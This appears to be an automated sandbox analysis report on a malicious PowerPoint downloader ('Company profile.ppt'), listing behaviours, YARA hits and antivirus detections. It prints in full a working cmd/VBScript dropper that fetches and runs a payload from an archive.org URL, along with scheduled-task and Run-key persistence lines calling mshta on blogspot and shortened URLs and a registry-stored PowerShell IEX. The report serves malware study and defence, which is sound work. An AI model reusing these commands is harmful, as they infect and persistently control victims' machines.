ShellExecuteExW April 14, 2021, 6:07 p.m.	show_type: 0 filepath_r: cMd parameters: /c cd C:\Users\Public &@echo dim http_obj >>SiggiaW.vbs &@echo dim stream_obj >>SiggiaW.vbs &@echo dim shell_obj >>SiggiaW.vbs &@echo set http_obj = CreateObject("Microsoft.XMLHTTP") >>SiggiaW.vbs &@echo set stream_obj = CreateObject("ADODB.Stream") >>SiggiaW.vbs &@echo set shell_obj = CreateObject("WScript.Shell") >>SiggiaW.vbs &@echo URL = "https://ia801408.us.archive.org/25/items/defender_202103/defender.txt" >>SiggiaW.vbs &@echo http_obj.open "GET", URL, False >>SiggiaW.vbs &@echo http_obj.send >>SiggiaW.vbs &@echo stream_obj.type = 1 >>SiggiaW.vbs &@echo stream_obj.open >>SiggiaW.vbs &@echo stream_obj.write http_obj.responseBody >>SiggiaW.vbs &@echo stream_obj.savetofile "C:\Users\Public\1.txt", 2 >>SiggiaW.vbs &@echo Dim xxx >>SiggiaW.vbs &@echo Set xxx = CreateObject("Scripting.FileSystemObject") >>SiggiaW.vbs &@echo Set file = xxx.OpenTextFile("C:\Users\Public\1.txt", 1) >>SiggiaW.vbs &@echo content = file.ReadAll >>SiggiaW.vbs &@echo content = StrReverse(content) >>SiggiaW.vbs &@echo Dim fso >>SiggiaW.vbs &@echo Dim fdsafdsa >>SiggiaW.vbs &@echo Dim oNode, fdsaa >>SiggiaW.vbs &@echo Const adTypeBinary = 1 >>SiggiaW.vbs &@echo Const adSaveCreateOverWrite = 2 >>SiggiaW.vbs &@echo Set oNode = CreateObject("Msxml2.DOMDocument.3.0").CreateElement("base64") >>SiggiaW.vbs &@echo oNode.dataType = "bin.base64" >>SiggiaW.vbs &@echo oNode.Text = content >>SiggiaW.vbs &@echo Set fdsaa = CreateObject("ADODB.Stream") >>SiggiaW.vbs &@echo fdsaa.Type = adTypeBinary >>SiggiaW.vbs &@echo tempdir = CreateObject("WScript.Shell").ExpandEnvironmentStrings("C:\Users\Public\bin.vbs") >>SiggiaW.vbs &@echo LocalFile = tempdir >>SiggiaW.vbs &@echo fdsaa.Open >>SiggiaW.vbs &@echo fdsaa.Write oNode.nodeTypedValue >>SiggiaW.vbs &@echo fdsaa.SaveToFile LocalFile, adSaveCreateOverWrite >>SiggiaW.vbs &@echo Set fso = CreateObject("Scripting.FileSystemObject") >>SiggiaW.vbs &@echo Set fdsafdsa = CreateObject("WScript.Shell") >>SiggiaW.vbs &@echo If (fso.FileExists(LocalFile)) Then >>SiggiaW.vbs &@echo fdsafdsa.RUN (LocalFile) >>SiggiaW.vbs &@echo End If>>SiggiaW.vbs& SiggiaW.vbs &dEl SiggiaW.vbs filepath: cMd	1	1	0

Changes read-write memory protection to read-execute (probably to avoid detection when setting all RWX flags at the same time) (1 event)

Time & API	Arguments	Status	Return	Repeated
NtProtectVirtualMemory April 14, 2021, 6:07 p.m.	process_identifier: 888 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 4096 protection: 16 (PAGE_EXECUTE) base_address: 0x03ce0000 process_handle: 0xffffffff	1	0	0

Checks for the Locally Unique Identifier on the system for a suspicious privilege (2 events)

Time & API	Arguments	Status	Return	Repeated
LookupPrivilegeValueW April 14, 2021, 6:07 p.m.	system_name: privilege_name: SeDebugPrivilege	1	1	0
LookupPrivilegeValueW April 14, 2021, 6:07 p.m.	system_name: privilege_name: SeDebugPrivilege	1	1	0

Yara rule detected in process memory (12 events)

description	Affect system registries	rule	win_registry
description	Affect system token	rule	win_token
description	Affect private profile	rule	win_private_profile
description	Affect private profile	rule	win_files_operation
description	(no description)	rule	DebuggerCheck__GlobalFlags
description	(no description)	rule	DebuggerCheck__QueryInfo
description	(no description)	rule	DebuggerHiding__Thread
description	(no description)	rule	DebuggerHiding__Active
description	(no description)	rule	ThreadControl__Context
description	(no description)	rule	SEH__vectored
description	Checks if being debugged	rule	anti_dbg
description	Bypass DEP	rule	disable_dep

Uses Windows utilities for basic Windows functionality (8 events)

cmdline	schtasks /create /sc MINUTE /mo 80 /tn ""WIND0WSUPLATE"" /F /tr ""\""mshta\""vbscript:Execute("\"CreateObject(""\""Wscript.Shell""\"").Run ""\""mshta http://1230948%1230948@randikhanaekminar.blogspot.com/p/divinefriend1.html""\"", 0 : window.close"\")
cmdline	cmd /c taskkill /f /im winword.exe & taskkill /f /im EXCEL.exe
cmdline	taskkill /f /im winword.exe
cmdline	"C:\Windows\System32\cmd.exe" /c cd C:\Users\Public &@echo dim http_obj >>SiggiaW.vbs &@echo dim stream_obj >>SiggiaW.vbs &@echo dim shell_obj >>SiggiaW.vbs &@echo set http_obj = CreateObject("Microsoft.XMLHTTP") >>SiggiaW.vbs &@echo set stream_obj = CreateObject("ADODB.Stream") >>SiggiaW.vbs &@echo set shell_obj = CreateObject("WScript.Shell") >>SiggiaW.vbs &@echo URL = "https://ia801408.us.archive.org/25/items/defender_202103/defender.txt" >>SiggiaW.vbs &@echo http_obj.open "GET", URL, False >>SiggiaW.vbs &@echo http_obj.send >>SiggiaW.vbs &@echo stream_obj.type = 1 >>SiggiaW.vbs &@echo stream_obj.open >>SiggiaW.vbs &@echo stream_obj.write http_obj.responseBody >>SiggiaW.vbs &@echo stream_obj.savetofile "C:\Users\Public\1.txt", 2 >>SiggiaW.vbs &@echo Dim xxx >>SiggiaW.vbs &@echo Set xxx = CreateObject("Scripting.FileSystemObject") >>SiggiaW.vbs &@echo Set file = xxx.OpenTextFile("C:\Users\Public\1.txt", 1) >>SiggiaW.vbs &@echo content = file.ReadAll >>SiggiaW.vbs &@echo content = StrReverse(content) >>SiggiaW.vbs &@echo Dim fso >>SiggiaW.vbs &@echo Dim fdsafdsa >>SiggiaW.vbs &@echo Dim oNode, fdsaa >>SiggiaW.vbs &@echo Const adTypeBinary = 1 >>SiggiaW.vbs &@echo Const adSaveCreateOverWrite = 2 >>SiggiaW.vbs &@echo Set oNode = CreateObject("Msxml2.DOMDocument.3.0").CreateElement("base64") >>SiggiaW.vbs &@echo oNode.dataType = "bin.base64" >>SiggiaW.vbs &@echo oNode.Text = content >>SiggiaW.vbs &@echo Set fdsaa = CreateObject("ADODB.Stream") >>SiggiaW.vbs &@echo fdsaa.Type = adTypeBinary >>SiggiaW.vbs &@echo tempdir = CreateObject("WScript.Shell").ExpandEnvironmentStrings("C:\Users\Public\bin.vbs") >>SiggiaW.vbs &@echo LocalFile = tempdir >>SiggiaW.vbs &@echo fdsaa.Open >>SiggiaW.vbs &@echo fdsaa.Write oNode.nodeTypedValue >>SiggiaW.vbs &@echo fdsaa.SaveToFile LocalFile, adSaveCreateOverWrite >>SiggiaW.vbs &@echo Set fso = CreateObject("Scripting.FileSystemObject") >>SiggiaW.vbs &@echo Set fdsafdsa = CreateObject("WScript.Shell") >>SiggiaW.vbs &@echo If (fso.FileExists(LocalFile)) Then >>SiggiaW.vbs &@echo fdsafdsa.RUN (LocalFile) >>SiggiaW.vbs &@echo End If>>SiggiaW.vbs& SiggiaW.vbs &dEl SiggiaW.vbs
cmdline	taskkill /f /im EXCEL.exe
cmdline	"C:\Windows\System32\cmd.exe" /c taskkill /f /im winword.exe & taskkill /f /im EXCEL.exe
cmdline	cMd /c cd C:\Users\Public &@echo dim http_obj >>SiggiaW.vbs &@echo dim stream_obj >>SiggiaW.vbs &@echo dim shell_obj >>SiggiaW.vbs &@echo set http_obj = CreateObject("Microsoft.XMLHTTP") >>SiggiaW.vbs &@echo set stream_obj = CreateObject("ADODB.Stream") >>SiggiaW.vbs &@echo set shell_obj = CreateObject("WScript.Shell") >>SiggiaW.vbs &@echo URL = "https://ia801408.us.archive.org/25/items/defender_202103/defender.txt" >>SiggiaW.vbs &@echo http_obj.open "GET", URL, False >>SiggiaW.vbs &@echo http_obj.send >>SiggiaW.vbs &@echo stream_obj.type = 1 >>SiggiaW.vbs &@echo stream_obj.open >>SiggiaW.vbs &@echo stream_obj.write http_obj.responseBody >>SiggiaW.vbs &@echo stream_obj.savetofile "C:\Users\Public\1.txt", 2 >>SiggiaW.vbs &@echo Dim xxx >>SiggiaW.vbs &@echo Set xxx = CreateObject("Scripting.FileSystemObject") >>SiggiaW.vbs &@echo Set file = xxx.OpenTextFile("C:\Users\Public\1.txt", 1) >>SiggiaW.vbs &@echo content = file.ReadAll >>SiggiaW.vbs &@echo content = StrReverse(content) >>SiggiaW.vbs &@echo Dim fso >>SiggiaW.vbs &@echo Dim fdsafdsa >>SiggiaW.vbs &@echo Dim oNode, fdsaa >>SiggiaW.vbs &@echo Const adTypeBinary = 1 >>SiggiaW.vbs &@echo Const adSaveCreateOverWrite = 2 >>SiggiaW.vbs &@echo Set oNode = CreateObject("Msxml2.DOMDocument.3.0").CreateElement("base64") >>SiggiaW.vbs &@echo oNode.dataType = "bin.base64" >>SiggiaW.vbs &@echo oNode.Text = content >>SiggiaW.vbs &@echo Set fdsaa = CreateObject("ADODB.Stream") >>SiggiaW.vbs &@echo fdsaa.Type = adTypeBinary >>SiggiaW.vbs &@echo tempdir = CreateObject("WScript.Shell").ExpandEnvironmentStrings("C:\Users\Public\bin.vbs") >>SiggiaW.vbs &@echo LocalFile = tempdir >>SiggiaW.vbs &@echo fdsaa.Open >>SiggiaW.vbs &@echo fdsaa.Write oNode.nodeTypedValue >>SiggiaW.vbs &@echo fdsaa.SaveToFile LocalFile, adSaveCreateOverWrite >>SiggiaW.vbs &@echo Set fso = CreateObject("Scripting.FileSystemObject") >>SiggiaW.vbs &@echo Set fdsafdsa = CreateObject("WScript.Shell") >>SiggiaW.vbs &@echo If (fso.FileExists(LocalFile)) Then >>SiggiaW.vbs &@echo fdsafdsa.RUN (LocalFile) >>SiggiaW.vbs &@echo End If>>SiggiaW.vbs& SiggiaW.vbs &dEl SiggiaW.vbs
cmdline	"C:\Windows\System32\schtasks.exe" /create /sc MINUTE /mo 80 /tn ""WIND0WSUPLATE"" /F /tr ""\""mshta\""vbscript:Execute("\"CreateObject(""\""Wscript.Shell""\"").Run ""\""mshta http://1230948%1230948@randikhanaekminar.blogspot.com/p/divinefriend1.html""\"", 0 : window.close"\")

Wscript.exe initiated network communications indicative of a script based payload download (3 events)

Time & API	Arguments	Status	Return
InternetCrackUrlW April 14, 2021, 6:07 p.m.	url: https://ia801408.us.archive.org/25/items/defender_202103/defender.txt flags: 0	1	1
HttpOpenRequestW April 14, 2021, 6:07 p.m.	connect_handle: 0x00cc0008 http_version: flags: 12582912 http_method: GET referer: path: /25/items/defender_202103/defender.txt	1	13369356
InternetCrackUrlA April 14, 2021, 6:07 p.m.	url: https://ia801408.us.archive.org/25/items/defender_202103/defender.txt flags: 0	1	1

Installs itself for autorun at Windows startup (6 events)

reg_key	HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\DLESOLCRETSAM	reg_value	mshta vbscript:Execute("CreateObject(""Wscript.Shell"").Run ""powershell ((gp HKCU:\Software).MSOFFICELO)\|IEX"", 0 : window.close")
reg_key	HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\dkkkksakdosexography	reg_value	"mshta""http://1230948%1230948@backbones1234511a.blogspot.com/p/divinefriend1backup.html"
reg_key	HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\(Default)	reg_value	"mshta""http://1230948%1230948@startthepartyup.blogspot.com/p/backbone15.html"
reg_key	HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\nunukhaoo	reg_value	"mshta""http://1230948%1230948@ghostbackbone123.blogspot.com/p/ghostbackup14.html"
cmdline	schtasks /create /sc MINUTE /mo 80 /tn ""WIND0WSUPLATE"" /F /tr ""\""mshta\""vbscript:Execute("\"CreateObject(""\""Wscript.Shell""\"").Run ""\""mshta http://1230948%1230948@randikhanaekminar.blogspot.com/p/divinefriend1.html""\"", 0 : window.close"\")
cmdline	"C:\Windows\System32\schtasks.exe" /create /sc MINUTE /mo 80 /tn ""WIND0WSUPLATE"" /F /tr ""\""mshta\""vbscript:Execute("\"CreateObject(""\""Wscript.Shell""\"").Run ""\""mshta http://1230948%1230948@randikhanaekminar.blogspot.com/p/divinefriend1.html""\"", 0 : window.close"\")

Disables proxy possibly for traffic interception (1 event)

Time & API	Arguments	Status	Return	Repeated
RegSetValueExA April 14, 2021, 6:07 p.m.	key_handle: 0x000002c0 regkey_r: ProxyEnable reg_type: 4 (REG_DWORD) value: 0 regkey: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ProxyEnable	1	0	0

Drops a binary and executes it (1 event)

file	C:\Users\Public\SiggiaW.vbs

wscript.exe-based dropper (JScript, VBS) (1 event)

Attempts to create or modify system certificates (1 event)

registry

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\2796BAE63F1801E277261BA0D77770028F20EEE4\Blob

Network communications indicative of a potential document or script payload download was initiated by the process wscript.exe (10 events)

Time & API	Arguments	Status	Return
InternetCrackUrlW April 14, 2021, 6:07 p.m.	url: https://ia801408.us.archive.org/25/items/defender_202103/defender.txt flags: 0	1	1
HttpOpenRequestW April 14, 2021, 6:07 p.m.	connect_handle: 0x00cc0008 http_version: flags: 12582912 http_method: GET referer: path: /25/items/defender_202103/defender.txt	1	13369356
send April 14, 2021, 6:07 p.m.	buffer: ! socket: 792 sent: 1	1	1
send April 14, 2021, 6:07 p.m.	buffer: zv`v°ÆsÃ( ,G¿Õ¡änD}¡Ë±wa/5 ÀÀÀ À 285ÿia801408.us.archive.org socket: 908 sent: 127	1	127
send April 14, 2021, 6:07 p.m.	buffer: ! socket: 792 sent: 1	1	1
send April 14, 2021, 6:07 p.m.	buffer: FBAÕ:±!eªeìiS@c¾k÷ÆG!ÜËÚbuqJ±ÞÛî $F(Äìæ,Ó¥ä¦rF¹ü7ü½^=Ä0ð+FÃ)×aõíÛ§Ó¶\ÍÃÆ·pGÆûÎÎIrb£B4ÍXTCâ;o socket: 908 sent: 134	1	134
send April 14, 2021, 6:07 p.m.	buffer: ! socket: 792 sent: 1	1	1
send April 14, 2021, 6:07 p.m.	buffer: p¥ððëy?ÂSy½¸[09Rl%×kÂUÑªúõ àÕ°TK}WÓfç%¹íÄf\oÐë5TÒ;=xW6w"\|=j÷ D¼.9Ñ¯ÉØwõ¤»á«o g¯¡¯z¯"XIHªÑè.PVÎ±<Ðf£_EÊãZò;@½úÝìj+§ Òjo³¨÷Ë]æÀÞù:öxM]>k{wJMÃ©«vQÑ_á7îj-óÚÙ>þW©¡â¹=\'=[«Ü\t]\_§¤7ÌÞ¸¡²Éh$äá2±åeüô¡ø{ýÊ,&;Þ¸g»ÁÇùh¤Î{×dëÒ ÒV=:l~ý"éà1F/ûüfñÅgãóûrE\|ÿq^>JRÜx?TÊ£¹A[gûJ¿ XçÕX=ý¸jiN socket: 908 sent: 373	1	373
send April 14, 2021, 6:07 p.m.	buffer: ! socket: 792 sent: 1	1	1
InternetCrackUrlA April 14, 2021, 6:07 p.m.	url: https://ia801408.us.archive.org/25/items/defender_202103/defender.txt flags: 0	1	1

Stores PowerShell commands in the registry likely for persistence (1 event)

Time & API	Arguments	Status	Return	Repeated
RegSetValueExA April 14, 2021, 6:07 p.m.	key_handle: 0x000006f0 regkey_r: DLESOLCRETSAM reg_type: 1 (REG_SZ) value: mshta vbscript:Execute("CreateObject(""Wscript.Shell"").Run ""powershell ((gp HKCU:\Software).MSOFFICELO)\|IEX"", 0 : window.close") regkey: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\DLESOLCRETSAM	1	0	0

One or more non-whitelisted processes were created (1 event)

parent_process

powerpnt.exe

martian_process

MsHTa HTTp://j.mp/guwkqbhskagshjtyuiwqbh

Resumed a suspended thread in a remote process potentially indicative of process injection (2 events)

Time & API	Arguments	Status	Return	Repeated
Process injection	Process 1808 resumed a thread in remote process 2668
NtResumeThread April 14, 2021, 6:07 p.m.	thread_handle: 0x00000234 suspend_count: 1 process_identifier: 2668	1	0	0

The process wscript.exe wrote an executable file to disk (1 event)

file	C:\Windows\SysWOW64\wscript.exe

Generates some ICMP traffic

File has been identified by 20 AntiVirus engines on VirusTotal as malicious (20 events)

FireEye	VB:Trojan.Valyria.4194
Cyren	PP97M/Agent.UA.gen!Eldorado
Symantec	Trojan.Gen.NPE
ESET-NOD32	a variant of VBA/TrojanDownloader.Agent.VWV
TrendMicro-HouseCall	TROJ_FRS.VSNTDE21
Avast	Script:SNH-gen [Trj]
Kaspersky	UDS:DangerousObject.Multi.Generic
BitDefender	VB:Trojan.Valyria.4194
MicroWorld-eScan	VB:Trojan.Valyria.4194
Rising	Malware.ObfusVBA@ML.92 (VBA)
Ad-Aware	VB:Trojan.Valyria.4194
Emsisoft	VB:Trojan.Valyria.4194 (B)
Ikarus	Trojan-Downloader.VBA.Agent
Microsoft	TrojanDownloader:O97M/EncDoc.VIS!MTB
AegisLab	Trojan.Script.Generic.4!c
GData	VB:Trojan.Valyria.4194
MAX	malware (ai score=89)
Fortinet	VBA/Agent.4194!tr
AVG	Script:SNH-gen [Trj]
Qihoo-360	virus.office.qexvmc.1065

Company profile.ppt

Process Tree Toggle all

Network Toggle all

Suricata Toggle all

Suricata Alerts

Suricata TLS

Signatures Toggle All